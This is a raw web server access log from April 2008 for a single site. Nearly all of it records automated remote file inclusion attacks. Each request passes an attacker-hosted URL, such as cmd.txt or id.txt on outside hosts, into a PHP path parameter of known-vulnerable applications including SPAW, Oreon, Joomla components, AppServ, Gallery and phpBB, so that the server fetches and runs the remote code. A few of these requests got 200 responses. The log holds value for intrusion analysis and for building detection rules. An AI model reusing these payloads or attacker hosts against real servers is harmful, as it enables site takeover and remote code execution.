200.62.54.120 - - [10/Apr/2008:13:46:37 -0700] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://theleybournes.com/img/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
72.232.122.239 - - [10/Apr/2008:13:46:44 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.38.18.119 - - [10/Apr/2008:13:46:49 -0700] "GET /logs/access_071215.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://theleybournes.com/images/g2.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
65.38.18.119 - - [10/Apr/2008:13:47:16 -0700] "GET /logs/access_080131.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://theleybournes.com/images/g2.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
200.1.202.61 - - [10/Apr/2008:13:47:25 -0700] "GET /logs/access_080207.log/index2.php?x=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.1.202.61 - - [10/Apr/2008:13:47:28 -0700] "GET /index2.php?x=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.38.18.119 - - [10/Apr/2008:13:47:31 -0700] "GET /logs/access_080218.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://theleybournes.com/images/g2.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
65.38.18.119 - - [10/Apr/2008:13:47:31 -0700] "GET /logs/access_071212.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://theleybournes.com/images/g2.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
200.1.202.61 - - [10/Apr/2008:13:47:32 -0700] "GET /logs/index2.php?x=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.38.18.119 - - [10/Apr/2008:13:47:40 -0700] "GET /logs/access_071202.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://theleybournes.com/images/g2.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
61.100.6.58 - - [10/Apr/2008:13:47:43 -0700] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://theleybournes.com/img/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
61.100.6.58 - - [10/Apr/2008:13:47:43 -0700] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://theleybournes.com/img/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
72.232.122.239 - - [10/Apr/2008:13:47:47 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
87.106.18.76 - - [10/Apr/2008:13:48:01 -0700] "GET //codebb/lang_select?phpbb_root_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.38.18.119 - - [10/Apr/2008:13:48:01 -0700] "GET /logs/access_080225.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://theleybournes.com/images/g2.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
65.38.18.119 - - [10/Apr/2008:13:48:02 -0700] "GET /logs/access_080324.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://theleybournes.com/images/g2.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
72.232.122.239 - - [10/Apr/2008:13:48:08 -0700] "GET /logs/access_080401.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.6.22.92 - - [10/Apr/2008:13:48:28 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.18.151 - - [10/Apr/2008:13:48:31 -0700] "GET / HTTP/1.0" 200 7355 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
65.38.18.119 - - [10/Apr/2008:13:48:33 -0700] "GET /logs/access_080213.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://theleybournes.com/images/g2.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
71.245.244.157 - - [10/Apr/2008:13:49:04 -0700] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.lineupevents.nl/.../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
71.245.244.157 - - [10/Apr/2008:13:49:04 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.lineupevents.nl/.../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
71.245.244.157 - - [10/Apr/2008:13:49:04 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.lineupevents.nl/.../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.38.18.119 - - [10/Apr/2008:13:49:29 -0700] "GET /logs/access_080219.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://theleybournes.com/images/g2.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
72.232.122.239 - - [10/Apr/2008:13:49:39 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.128.80.101 - - [10/Apr/2008:13:49:44 -0700] "GET /logs/access_080401.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.232.122.239 - - [10/Apr/2008:13:49:49 -0700] "GET /logs/access_080401.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.232.122.239 - - [10/Apr/2008:13:50:27 -0700] "GET /logs/access_080401.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
61.47.60.169 - - [10/Apr/2008:13:51:14 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
61.47.60.169 - - [10/Apr/2008:13:51:15 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.venezia2.it/coges.txt?? HTTP/1.1" 200 50 "-" "libwww-perl/5.810" "www.dmulk.com"
61.47.60.169 - - [10/Apr/2008:13:51:16 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
71.245.244.157 - - [10/Apr/2008:13:52:32 -0700] "GET /logs/access_080104.log/Neos_Chronos/header.php?base_folder=http://www.lineupevents.nl/.../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
71.245.244.157 - - [10/Apr/2008:13:52:32 -0700] "GET /Neos_Chronos/header.php?base_folder=http://www.lineupevents.nl/.../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
71.245.244.157 - - [10/Apr/2008:13:52:32 -0700] "GET /logs/Neos_Chronos/header.php?base_folder=http://www.lineupevents.nl/.../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.38.4.3 - - [10/Apr/2008:13:53:26 -0700] "GET /logs/access_080308.log//init_basic.php?GALLERY_BASEDIR=http://laifongtw.gotdns.com//appserv/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.38.4.3 - - [10/Apr/2008:13:53:26 -0700] "GET //init_basic.php?GALLERY_BASEDIR=http://laifongtw.gotdns.com//appserv/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.38.4.3 - - [10/Apr/2008:13:53:27 -0700] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://laifongtw.gotdns.com//appserv/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.232.122.239 - - [10/Apr/2008:13:53:30 -0700] "GET /logs/access_080401.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.38.18.119 - - [10/Apr/2008:13:54:13 -0700] "GET /logs/access_071214.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://theleybournes.com/images/g2.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
65.38.18.119 - - [10/Apr/2008:13:54:14 -0700] "GET /logs/access_071129.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://theleybournes.com/images/g2.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
71.245.244.157 - - [10/Apr/2008:13:54:17 -0700] "GET /logs/access_080122.log/Neos_Chronos/header.php?base_folder=http://www.lineupevents.nl/.../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.38.18.119 - - [10/Apr/2008:13:54:31 -0700] "GET /logs/access_071230.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://theleybournes.com/images/g2.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
65.38.18.119 - - [10/Apr/2008:13:55:34 -0700] "GET /logs/access_080308.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://theleybournes.com/images/g2.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
65.38.18.119 - - [10/Apr/2008:13:56:27 -0700] "GET /logs/access_070909.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://theleybournes.com/images/g2.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
67.195.37.167 - - [10/Apr/2008:13:56:49 -0700] "GET /logs/access_080127.log HTTP/1.0" 200 672308 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
65.38.18.119 - - [10/Apr/2008:13:59:17 -0700] "GET /logs/access_080106.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://theleybournes.com/images/g2.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
209.67.208.250 - - [10/Apr/2008:13:59:44 -0700] "GET //index.php?pagina=http://www.freewebtown.com/ppll/romania.txt?? HTTP/1.1" 200 7371 "-" "libwww-perl/5.810" "www.dmulk.com"
65.38.18.119 - - [10/Apr/2008:14:01:34 -0700] "GET /logs/access_080127.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://theleybournes.com/images/g2.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
65.38.18.119 - - [10/Apr/2008:14:02:10 -0700] "GET /logs/access_080101.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://theleybournes.com/images/g2.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
204.92.87.138 - - [10/Apr/2008:14:02:42 -0700] "GET /logs/access_080308.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.gomaka.com/gomaka/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.92.87.138 - - [10/Apr/2008:14:02:42 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.gomaka.com/gomaka/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.67.208.250 - - [10/Apr/2008:14:02:50 -0700] "GET /logs/access_080218.log//index.php?pagina=http://www.freewebtown.com/ppll/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.67.208.250 - - [10/Apr/2008:14:02:52 -0700] "GET //index.php?pagina=http://www.freewebtown.com/ppll/romania.txt?? HTTP/1.1" 200 7371 "-" "libwww-perl/5.810" "www.dmulk.com"
209.67.208.250 - - [10/Apr/2008:14:02:52 -0700] "GET /logs//index.php?pagina=http://www.freewebtown.com/ppll/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.67.208.250 - - [10/Apr/2008:14:02:52 -0700] "GET /logs/access_080225.log//index.php?pagina=http://www.freewebtown.com/ppll/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
61.47.60.169 - - [10/Apr/2008:14:03:09 -0700] "GET /logs/access_080312.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
81.177.16.181 - - [10/Apr/2008:14:04:16 -0700] "GET /logs/access_080215.log//include/functions_common.php?gl_root_path=http://www.ppxp.ru/images/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.177.16.181 - - [10/Apr/2008:14:04:17 -0700] "GET //include/functions_common.php?gl_root_path=http://www.ppxp.ru/images/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.177.16.181 - - [10/Apr/2008:14:04:17 -0700] "GET /logs//include/functions_common.php?gl_root_path=http://www.ppxp.ru/images/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.38.4.3 - - [10/Apr/2008:14:04:29 -0700] "GET /logs/access_080118.log//init_basic.php?GALLERY_BASEDIR=http://laifongtw.gotdns.com//appserv/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.128.80.101 - - [10/Apr/2008:14:05:42 -0700] "GET /logs/access_080223.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.128.80.101 - - [10/Apr/2008:14:05:42 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.128.80.101 - - [10/Apr/2008:14:05:42 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
91.196.124.8 - - [10/Apr/2008:14:05:56 -0700] "GET /logs/modifyform.html?code=http://www.montangero.ch/~monkampa/components/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
91.196.124.8 - - [10/Apr/2008:14:05:56 -0700] "GET /modifyform.html?code=http://www.montangero.ch/~monkampa/components/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
207.44.212.95 - - [10/Apr/2008:14:07:28 -0700] "GET //appserv/main.php?appserv_root=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.44.212.95 - - [10/Apr/2008:14:07:30 -0700] "GET //appserv/main.php?appserv_root=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.44.212.95 - - [10/Apr/2008:14:07:39 -0700] "GET //appserv/main.php?appserv_root=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.44.212.95 - - [10/Apr/2008:14:07:50 -0700] "GET /logs/access_080401.log//appserv/main.php?appserv_root=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.44.212.95 - - [10/Apr/2008:14:07:50 -0700] "GET //appserv/main.php?appserv_root=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.44.212.95 - - [10/Apr/2008:14:07:50 -0700] "GET /logs//appserv/main.php?appserv_root=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.44.212.95 - - [10/Apr/2008:14:07:51 -0700] "GET /logs/access_080401.log//appserv/main.php?appserv_root=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.44.212.95 - - [10/Apr/2008:14:07:51 -0700] "GET //appserv/main.php?appserv_root=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.44.212.95 - - [10/Apr/2008:14:07:51 -0700] "GET /logs//appserv/main.php?appserv_root=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.44.212.95 - - [10/Apr/2008:14:07:52 -0700] "GET /logs/access_080401.log//appserv/main.php?appserv_root=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.44.212.95 - - [10/Apr/2008:14:07:52 -0700] "GET //appserv/main.php?appserv_root=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.44.212.95 - - [10/Apr/2008:14:07:52 -0700] "GET /logs//appserv/main.php?appserv_root=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.14.46 - - [10/Apr/2008:14:07:54 -0700] "GET /logs/access_080215.log/include/functions_common.php?gl_root_path=http://www.youwilllistentowhatwesay.com/rayven//modules/Forums/admin/language/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.14.46 - - [10/Apr/2008:14:07:55 -0700] "GET /include/functions_common.php?gl_root_path=http://www.youwilllistentowhatwesay.com/rayven//modules/Forums/admin/language/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.14.46 - - [10/Apr/2008:14:07:55 -0700] "GET /logs/include/functions_common.php?gl_root_path=http://www.youwilllistentowhatwesay.com/rayven//modules/Forums/admin/language/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.44.212.95 - - [10/Apr/2008:14:08:12 -0700] "GET /logs/access.log//appserv/main.php?appserv_root=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.44.212.95 - - [10/Apr/2008:14:08:12 -0700] "GET /logs/access.log//appserv/main.php?appserv_root=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.44.212.95 - - [10/Apr/2008:14:08:13 -0700] "GET /logs/access.log//appserv/main.php?appserv_root=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
75.125.151.18 - - [10/Apr/2008:14:08:45 -0700] "GET //config.inc.php?path_escape=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.32.94.50 - - [10/Apr/2008:14:09:16 -0700] "GET /logs/access_080401.log//appserv/main.php?appserv_root=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.32.94.50 - - [10/Apr/2008:14:09:16 -0700] "GET //appserv/main.php?appserv_root=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.32.94.50 - - [10/Apr/2008:14:09:16 -0700] "GET /logs//appserv/main.php?appserv_root=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.32.94.50 - - [10/Apr/2008:14:09:30 -0700] "GET /logs/access_080401.log//appserv/main.php?appserv_root=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.32.94.50 - - [10/Apr/2008:14:09:30 -0700] "GET //appserv/main.php?appserv_root=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.32.94.50 - - [10/Apr/2008:14:09:30 -0700] "GET /logs//appserv/main.php?appserv_root=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.125.151.18 - - [10/Apr/2008:14:09:32 -0700] "GET //appserv/main.php?appserv_root=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.32.94.50 - - [10/Apr/2008:14:09:37 -0700] "GET //appserv/main.php?appserv_root=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.32.94.50 - - [10/Apr/2008:14:09:43 -0700] "GET //appserv/main.php?appserv_root=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.32.94.50 - - [10/Apr/2008:14:09:44 -0700] "GET /logs/access.log//appserv/main.php?appserv_root=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.32.94.50 - - [10/Apr/2008:14:09:51 -0700] "GET /logs/access.log//appserv/main.php?appserv_root=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.125.151.18 - - [10/Apr/2008:14:10:10 -0700] "GET //appserv/main.php?appserv_root=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.125.151.18 - - [10/Apr/2008:14:10:34 -0700] "GET //appserv/main.php?appserv_root=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.185.193.90 - - [10/Apr/2008:14:10:40 -0700] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://novobx.iespana.es/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
91.185.193.90 - - [10/Apr/2008:14:10:40 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://novobx.iespana.es/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
75.125.151.18 - - [10/Apr/2008:14:10:54 -0700] "GET /logs/access_080226.log//config.inc.php?path_escape=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.19.158.41 - - [10/Apr/2008:14:10:54 -0700] "GET //appserv/main.php?appserv_root=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.19.158.41 - - [10/Apr/2008:14:10:54 -0700] "GET //appserv/main.php?appserv_root=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.19.158.41 - - [10/Apr/2008:14:10:54 -0700] "GET //appserv/main.php?appserv_root=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
75.125.151.18 - - [10/Apr/2008:14:10:54 -0700] "GET //config.inc.php?path_escape=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.125.151.18 - - [10/Apr/2008:14:10:55 -0700] "GET /logs//config.inc.php?path_escape=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.125.151.18 - - [10/Apr/2008:14:11:12 -0700] "GET /logs/access_080215.log//config.inc.php?path_escape=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.67.208.250 - - [10/Apr/2008:14:11:19 -0700] "GET /logs/access_080218.log//index.php?pagina=http://www.freewebtown.com/ppll/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.87.105 - - [10/Apr/2008:14:11:21 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.dabrosca.net/demo????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.67.208.250 - - [10/Apr/2008:14:11:21 -0700] "GET //index.php?pagina=http://www.freewebtown.com/ppll/romania.txt?? HTTP/1.1" 200 7371 "-" "libwww-perl/5.810" "www.dmulk.com"
209.67.208.250 - - [10/Apr/2008:14:11:21 -0700] "GET /logs//index.php?pagina=http://www.freewebtown.com/ppll/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
75.125.151.18 - - [10/Apr/2008:14:11:21 -0700] "GET /logs/access_080401.log//appserv/main.php?appserv_root=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.125.151.18 - - [10/Apr/2008:14:11:21 -0700] "GET //appserv/main.php?appserv_root=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.125.151.18 - - [10/Apr/2008:14:11:27 -0700] "GET /logs//appserv/main.php?appserv_root=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.125.151.18 - - [10/Apr/2008:14:11:29 -0700] "GET /logs/access_080401.log//appserv/main.php?appserv_root=http://www.ceia.uchile.cl/templates/blackbear/images/button.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
